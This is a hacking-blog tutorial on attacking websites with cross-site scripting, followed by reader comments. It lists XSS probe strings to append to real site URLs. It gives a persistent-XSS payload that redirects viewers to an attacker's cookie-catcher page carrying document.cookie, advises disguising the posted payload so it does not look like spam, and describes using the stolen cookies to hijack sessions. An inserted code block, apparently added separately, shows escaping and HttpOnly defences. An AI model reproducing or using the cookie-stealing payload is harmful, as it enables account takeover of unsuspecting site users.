I have already posted about How to Hack Website Completely using SQL Injection and I have also posted a Video Tutorial on it. Today I am going to start on XSS. I know most of the guys don't even know its name, so I am gonna start from the very basics to give you the whole concept of it. Hope you guys like it.
Introduction of XSS
- An XSS attack is used to hack websites online, and it mostly works on those sites which use cookies for storing your username and password when you log in to that site. Check this Wikipedia article to learn what cookies are.
- XSS usually works on those sites which allow users to add any code in an open place, like starting a new thread in a forum, or which let users send code in messages to other members. It is actually a script / a piece of code which the attacker submits, and whoever clicks on it or even sees it gets affected.
- The purpose of the attacker or hacker doing XSS is to steal the cookie of a user who is currently logged in on that site and viewing the code submitted by the hacker, so that he can later use that cookie to get into that user's account. (Steal in this context means just getting a copy of the cookie, rather than removing the original cookie.)
For example: user A logs in on a site and user B uses an XSS attack and gets the cookie of user A; now user B can easily get into the account of user A using these cookies ..... :))
Finding XSS Vulnerable Sites:
- First of all, we need to find sites which are vulnerable to XSS attack. There are many such sites.
- To find XSS vulnerable sites, add a code after the link. Add the codes given below after the site link to find whether the site is vulnerable or not:
Code: "><script>alert(document.cookie)</script>
Code: '><script>alert(document.cookie)</script>
Code: "><script>alert("Test")</script>
Code: '><script>alert("Test")</script>
Or a new one which I found out myself, with which you can inject HTML:
Code:"><body bgcolor="FF0000"></body>
Code:"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>
- After adding these codes after the link: if your site is http://www.example.com, the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script> and now press Enter.
- Then if we see a JavaScript pop-up, or the page's background changes colour, or a page of Google opens inside that site, it means we have come to an XSS vulnerable site.
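Why those test strings fire on a vulnerable page, and what stops them, as an added example that is not part of the original post. It also covers the cookie point from the introduction: a session cookie sent with HttpOnly is not readable through document.cookie. The function names and the sample cookie value are assumptions made for illustration.

```javascript
// Added example; renderVulnerable, renderEscaped, containsInjectedTag and
// sessionCookieHeader are hypothetical names, not code from any real site.

// Test strings quoted from the article above.
const PROBES = [
  '"><script>alert(document.cookie)</script>',
  "'><script>alert(\"Test\")</script>",
  '"><body bgcolor="FF0000"></body>',
];

// Vulnerable pattern: the id parameter is pasted into an attribute unchanged,
// so a quote followed by > closes the attribute and the tag, and the rest of
// the input is parsed by the browser as new markup.
function renderVulnerable(id) {
  return '<input name="id" value="' + id + '">';
}

// Fix: encode the characters that are significant in HTML text and in quoted
// attribute values. One pass, so "&" is never double-encoded.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

function renderEscaped(id) {
  return '<input name="id" value="' + escapeHtml(id) + '">';
}

// Regression check: did user input turn into a tag the template never wrote?
function containsInjectedTag(html) {
  return /<(script|body|iframe)\b/i.test(html);
}

// Defence in depth for the session cookie: HttpOnly hides it from
// document.cookie, Secure keeps it off plain HTTP, SameSite limits
// cross-site sending.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

for (const p of PROBES) {
  console.log('vulnerable:', containsInjectedTag(renderVulnerable(p)),
              'escaped:', containsInjectedTag(renderEscaped(p)));
}
console.log('Set-Cookie:', sessionCookieHeader('sid', 'constructed-sample-value'));
```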
Types of XSS Attack
- There are two mostly used types of XSS attack:
  - Persistent XSS
  - Non-Persistent XSS
Persistent XSS:
- This is the first type of XSS. In this method we will steal the victim's cookies with no suspicion on us.
- So, let us assume that we have found an XSS vulnerable forum which has HTML enabled, or a site which has a comment page which is vulnerable to XSS attack.
- So now let's try to grab its cookies.
- First of all, download a cookie catcher tool online by searching on Google and upload it on any free hosting site which supports PHP.
- Now come to that vulnerable site and, if there is a box to type and submit, then add the following code in it:
Code:<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
- Replace the bold link with the link of your cookie catcher uploaded on the free hosting site.
- Now submit that post in the forum or the comment box, and I would suggest adding some text before or after it so that it won't look like spam.
- Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php
- Search for cookies.html, which is a new file that shows you the cookies. For example, if your cookie catcher link is: http://www.example.com/cookie catcher.php the container of the cookies would be: http://www.example.com/cookies.html
- Now save these cookies as we are gonna use them to hijack the session of the victim.... ;)
Update: I have posted the second part of this tutorial, named Hack Website using XSS Attack - Non Persistent Method.
6 comments:
Add the complete tutorial man, curious to learn it asap
Sounds good! I'll like to give it a shot
@Sheharyar ya man I will explain everything related to it .... have a little patience as I have to write the tutorial so its really very difficult and takes time .... :))
@fotograf nunta ya its worth giving a shot man .... ;))
pls post video tutorial on xss attack...........post some sites vulnerable to xss......
I didn't find a site to xss
last step is not working.........
Regards,
XEO Hacker